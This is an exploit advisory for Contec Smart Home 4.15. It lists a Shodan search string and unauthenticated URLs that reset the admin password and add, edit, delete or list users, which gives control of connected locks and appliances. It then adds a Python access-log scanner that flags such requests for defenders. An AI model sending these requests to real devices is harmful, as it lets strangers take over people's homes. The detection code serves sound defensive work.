Contec Smart Home 4.15 – Unauthorized Password Reset

  • Author: Z3ro0ne
    Date: 2018-03-16
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44295/
  • # Title: Contec smart home 4.15 Unauthorized Password Reset
    # Shodan Dork : "content/smarthome.php"
    # Vendor Homepage: http://contec.co.il
    # Tested on: Google Chrome
    # Tested version : 4.15
    # Date : 2018-03-14
    # Author : Z3ro0ne
    # Contact: saadousfar59@gmail.com
    # Facebook Page: https://www.facebook.com/Z3ro0ne
     
    # Vulnerability description :
    The vulnerability allows an unauthenticated attacker to remotely bypass authentication, change the admin password without knowing the old password, and control connected devices (lamps, doors, air conditioner...).
    
    
    # Exploit 
    
     To Reset Admin password 
     http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1
     
     To Create a new user
     http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1
     
     To edit a user
     http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1
     
     To Delete a user 
     http://Ipaddress:port/content/delete_user.php?user_name=USER
     
     Users list
     http://Ipaddress:port/content/user.php
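
For defenders, requests to the user-management endpoints listed above can be hunted for in the access log of the controller or of a proxy in front of it. The following is an added example, not part of the original advisory: it assumes common/combined log format and a hypothetical trusted management network (`192.168.10.0/24`), and the sample log lines are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints named in the advisory, mapped to the action they perform.
USER_MGMT = {
    "/content/new_user.php": "create_or_reset", "/content/edit_user.php": "edit",
    "/content/delete_user.php": "delete", "/content/user.php": "list",
}
TRUSTED_NET = ipaddress.ip_network("192.168.10.0/24")  # assumption: admin LAN
# Common/combined log format: client, timestamp, request line, status.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def is_trusted(client):
    try:
        return ipaddress.ip_address(client) in TRUSTED_NET
    except ValueError:  # hostname instead of an address: treat as untrusted
        return False

def scan(lines):
    """Return a finding for each user-management request from outside TRUSTED_NET."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or is_trusted(m["ip"]):
            continue
        url = urlsplit(m["target"])
        action = USER_MGMT.get(url.path.lower())
        if action is None:
            continue
        q = parse_qs(url.query)
        findings.append({
            "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "action": action,
            "user": q.get("user_name", [""])[0],
            "group_id": q.get("group_id", [""])[0],
            # The password sits in the URL, hence in the log: record presence only.
            "password_in_url": "password" in q,
        })
    return findings

# Constructed sample lines (documentation and private address ranges).
SAMPLE = [
    '203.0.113.7 - - [14/Mar/2018:10:02:11 +0000] "GET /content/user.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [14/Mar/2018:10:02:40 +0000] "GET /content/new_user.php?user_name=ADMIN&password=Secret1&group_id=1 HTTP/1.1" 200 64',
    '192.168.10.5 - - [14/Mar/2018:11:00:00 +0000] "GET /content/edit_user.php?user_name=bob&password=Secret1&group_id=2 HTTP/1.1" 200 64',
    '198.51.100.23 - - [14/Mar/2018:12:30:00 +0000] "GET /content/smarthome.php HTTP/1.1" 200 2048',
]
```

Because the password is a query-string parameter, every such request also leaves the new credential in plain text in the access log, so the logs themselves need restricted access.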